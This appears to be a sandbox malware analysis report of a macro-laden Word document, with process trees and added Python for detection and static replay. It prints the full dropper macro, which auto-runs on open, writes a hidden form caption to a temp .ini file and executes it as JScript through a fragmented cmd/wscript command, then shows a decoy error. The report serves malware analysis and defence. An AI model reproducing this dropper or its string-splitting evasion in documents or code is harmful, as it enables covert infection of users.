File size: | 20992 bytes |
MD5 hash: | ADC7AD3C261D2753CB7A2FE73A66C210 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:35 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x77390000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:36 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\ARP.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75440000 |
File size: | 20992 bytes |
MD5 hash: | ADC7AD3C261D2753CB7A2FE73A66C210 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:03:00 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75620000 |
File size: | 141824 bytes |
MD5 hash: | 979D74799EA6C8B8167869A68DF5204A |
Programmed in: | C, C++ or other language |
Reputation: | low |
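The process list above records, in start order, WINWORD.EXE (14:00:53), then cmd.exe, wscript.exe and schtasks.exe within about ten seconds of the document opening, and a minute later taskeng.exe (the Windows 7 task engine) launching wscript.exe, which in turn runs cmd.exe with net.exe and ARP.EXE, consistent with a scheduled task registered by the first wscript.exe firing and running host and network recon. The Python below is an added example written for this page, not code from the report or from Joe Sandbox, showing how that chain would be matched from endpoint process-creation telemetry. The report shows no parent process IDs and no command lines, so the parent links in the constructed events are assumed to follow the start order, and the pid values and the two benign console entries are invented for the example.

```python
"""Process-chain detection for the behavior recorded in the System Behavior
section. Added example for this page; not code from the report or from
Joe Sandbox."""
from typing import Dict, List, NamedTuple, Tuple


class Proc(NamedTuple):
    pid: int
    ppid: int
    image: str


# CONSTRUCTED process-creation events. Image paths and start order follow the
# report; pids, ppids and the two trailing "admin console" entries are assumed
# for the example (the report shows no parent links).
EVENTS: List[Proc] = [
    Proc(1000, 900, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"),
    Proc(1010, 1000, r"C:\Windows\System32\cmd.exe"),
    Proc(1020, 1010, r"C:\Windows\System32\wscript.exe"),
    Proc(1030, 1020, r"C:\Windows\System32\schtasks.exe"),
    Proc(1100, 600, r"C:\Windows\System32\taskeng.exe"),     # Task Scheduler engine
    Proc(1110, 1100, r"C:\Windows\System32\wscript.exe"),    # task fires the script
    Proc(1120, 1110, r"C:\Windows\System32\cmd.exe"),
    Proc(1130, 1120, r"C:\Windows\System32\net.exe"),
    Proc(1140, 1110, r"C:\Windows\System32\cmd.exe"),
    Proc(1150, 1140, r"C:\Windows\System32\ARP.EXE"),
    Proc(2000, 900, r"C:\Windows\System32\cmd.exe"),         # admin console, benign
    Proc(2010, 2000, r"C:\Windows\System32\ARP.EXE"),        # "arp -a" typed by hand, benign
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SPAWN_TARGETS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
RECON = {"net.exe", "arp.exe", "ipconfig.exe", "whoami.exe", "nltest.exe"}


def basename(image: str) -> str:
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def ancestors(proc: Proc, by_pid: Dict[int, Proc], max_depth: int = 8) -> List[Proc]:
    """Walk ppid links upward; stops at the root or after max_depth hops."""
    chain: List[Proc] = []
    cur = by_pid.get(proc.ppid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def evaluate(events: List[Proc]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) for every event matching one of four rules that
    together describe the chain in this report: a document opens a shell, the
    script host registers a task, the task engine later runs the script host,
    and recon tools run somewhere under that script host."""
    by_pid = {p.pid: p for p in events}
    hits: List[Tuple[str, int]] = []
    for p in events:
        name = basename(p.image)
        parent = by_pid.get(p.ppid)
        pname = basename(parent.image) if parent else ""
        if pname in OFFICE and name in SPAWN_TARGETS:
            hits.append(("office_spawns_shell", p.pid))
        if name == "schtasks.exe" and pname in SCRIPT_HOSTS:
            hits.append(("script_host_creates_task", p.pid))
        if name in SCRIPT_HOSTS and pname == "taskeng.exe":
            hits.append(("task_engine_runs_script_host", p.pid))
        if name in RECON and any(basename(a.image) in SCRIPT_HOSTS for a in ancestors(p, by_pid)):
            hits.append(("recon_under_script_host", p.pid))
    return hits


if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{rule:32s} pid={pid}")
```

On real telemetry the parent links come from Sysmon Event ID 1 (ParentProcessId, ParentImage) or Security event 4688 with command-line auditing enabled. The ancestry walk matters for the last rule: the recon binaries here are two hops below wscript.exe (via cmd.exe), so a parent-only check would miss them, while the hand-typed ARP.EXE under a plain console does not fire because no script host is in its chain.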
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Module: ThisDocument |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "1Normal.ThisDocument" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = True |
8 | Attribute VB_Customizable = True |
9 | Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds as Long) |
Executed Functions |
---|
APIs | Meta Information |
---|---|
CreateObject | CreateObject( |
GetSpecialFolder | |
StrReverse | StrReverse( |
Label1 | |
OpenTextFile | |
Split | |
WriteLine | |
Close | |
Shell | Shell( |
MsgBox |
Strings | Decrypted Strings |
---|---|
"Scripting.FileSystemObject" | |
"|*|" | |
"d.exe /c wsc" | |
"ript.exe //b /e:jsc" | |
"ript " | |
"c" | |
"Decryption failed! Try again" |
Line | Instruction | Meta Information |
---|---|---|
11 | Sub armando() | |
12 | Dim ikgygke | executed |
13 | Dim pbopegh | |
14 | Dim vbspbopegh | |
15 | Dim kuqa | |
16 | Dim knyvlaql | |
17 | Dim agluksad | |
18 | Dim dacxitj | |
19 | Dim ivwubka | |
20 | Set avfasci = CreateObject("Scripting.FileSystemObject") | CreateObject( |
21 | Set icrobbab = avfasci.GetSpecialFolder(2) | GetSpecialFolder |
22 | ikgygke = icrobbab & StrReverse("ini.daphsarc\") | StrReverse( |
23 | vbspbopegh = UserForm1.Label1.Caption | Label1 |
24 | Set ygtekra = avfasci.OpenTextFile(ikgygke, 2, True) | OpenTextFile |
25 | For Each one in Split(vbspbopegh, "|*|") | Split |
26 | ygtekra.WriteLine one | WriteLine |
27 | Next one | Split |
28 | ygtekra.Close | Close |
29 | kuqa = "d.exe /c wsc" | |
30 | knyvlaql = "ript.exe //b /e:jsc" | |
31 | agluksad = "ript " | |
32 | dacxitj = "c" | |
33 | ivwubka = dacxitj & "m" & kuqa & knyvlaql & agluksad & ikgygke | |
34 | Shell ivwubka, False | Shell( |
35 | MsgBox "Decryption failed! Try again" | MsgBox |
36 | End Sub |
APIs | Meta Information |
---|---|
Part of subcall function armando@ThisDocument: CreateObject | |
Part of subcall function armando@ThisDocument: GetSpecialFolder | |
Part of subcall function armando@ThisDocument: StrReverse | |
Part of subcall function armando@ThisDocument: Label1 | |
Part of subcall function armando@ThisDocument: OpenTextFile | |
Part of subcall function armando@ThisDocument: Split | |
Part of subcall function armando@ThisDocument: WriteLine | |
Part of subcall function armando@ThisDocument: Close | |
Part of subcall function armando@ThisDocument: Shell | |
Part of subcall function armando@ThisDocument: MsgBox |
Line | Instruction | Meta Information |
---|---|---|
37 | Sub AutoOpen() | |
38 | armando | executed |
39 | End Sub |
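The macro above is a plain dropper. AutoOpen calls armando, which resolves the temp folder (GetSpecialFolder(2) is TemporaryFolder), appends StrReverse("ini.daphsarc\") to obtain a file named crashpad.ini, writes UserForm1.Label1.Caption into it one "|*|"-delimited chunk per line, and assembles the command `cmd.exe /c wscript.exe //b /e:jscript <path>` from five string fragments so that neither "cmd.exe" nor "wscript.exe" appears as a literal in the module. The /e:jscript switch selects the JScript engine, so the .ini file runs as JScript regardless of its extension, and the closing "Decryption failed! Try again" message box is a decoy for the user. The Python below is an added example for this page, not code from the sample or from Joe Sandbox: it re-implements the three VBA primitives the macro relies on and replays the logic on a constructed caption, so the dropped file contents and the command line can be recovered statically without opening the document in Word. The temp path and the caption content are assumptions; the report shows neither. The last function is the detection check a practitioner would derive from this: a script host given an engine override while its script argument has no script extension.

```python
"""Static replay of the 'armando' dropper macro. Added example for this page;
not code from the sample or from Joe Sandbox."""
from dataclasses import dataclass
from typing import List

# GetSpecialFolder(2) is the TemporaryFolder. This value is an assumption for
# the example; the report does not show the path on the analysis VM.
TEMP_FOLDER = r"C:\Users\user\AppData\Local\Temp"

# Constructed stand-in for UserForm1.Label1.Caption. The real caption holds the
# JScript payload with "|*|" in place of line breaks; the report does not
# reproduce it, so two harmless lines are used here.
SAMPLE_CAPTION = 'var x = "constructed";|*|WScript.Echo(x);'

SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh")


def str_reverse(s: str) -> str:
    """VBA StrReverse: reverse the string character by character."""
    return s[::-1]


def vba_split(s: str, delim: str) -> List[str]:
    """VBA Split with a literal delimiter (no regex), same as str.split."""
    return s.split(delim)


@dataclass
class DropperResult:
    dropped_path: str      # file the macro writes (lines 22 and 24)
    dropped_content: str   # what ends up inside it (lines 25-28)
    command_line: str      # what Shell() receives (lines 29-34)


def emulate_armando(temp_folder: str, caption: str) -> DropperResult:
    """Replay lines 20-34 of the macro without executing any of it."""
    # Line 22: ikgygke = <Temp> & StrReverse("ini.daphsarc\")
    dropped_path = temp_folder + str_reverse("ini.daphsarc\\")
    # Lines 25-27: TextStream.WriteLine terminates each chunk with CRLF
    dropped_content = "".join(chunk + "\r\n" for chunk in vba_split(caption, "|*|"))
    # Lines 29-33: the command is built from fragments so that no tool name
    # survives as a whole literal in the VBA module
    kuqa = "d.exe /c wsc"
    knyvlaql = "ript.exe //b /e:jsc"
    agluksad = "ript "
    dacxitj = "c"
    command_line = dacxitj + "m" + kuqa + knyvlaql + agluksad + dropped_path
    return DropperResult(dropped_path, dropped_content, command_line)


def is_engine_extension_mismatch(command_line: str) -> bool:
    """Detection check: a script host is told which engine to use with /e: or
    //e: while the script argument carries no script extension. Legitimate
    scripts rarely need the override; droppers use it to run .ini, .txt or
    .dat files as JScript. Assumes an unquoted script path as the last token,
    which is the shape of the command in this sample."""
    tokens = command_line.lower().split()
    if not any(t.startswith(("/e:", "//e:")) for t in tokens):
        return False
    return not tokens[-1].endswith(SCRIPT_EXTS)


if __name__ == "__main__":
    result = emulate_armando(TEMP_FOLDER, SAMPLE_CAPTION)
    print("drops :", result.dropped_path)
    print("runs  :", result.command_line)
    print("engine/extension mismatch:", is_engine_extension_mismatch(result.command_line))
```

Replaying the string operations rather than running the macro is the point: the payload lives in a form control, not in the module, so static tools that only dump VBA see five harmless fragments and a StrReverse call. Swapping SAMPLE_CAPTION for the real Label1.Caption extracted from the document would reproduce crashpad.ini exactly as the sandbox saw it.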
Module: UserForm1 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "UserForm1" |
2 | Attribute VB_Base = "0{6B6BF1FB-AD60-430D-9A4A-863E0DAD35DE}{CE2C7631-6144-406D-97FA-AA4F3584AE8A}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = False |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = False |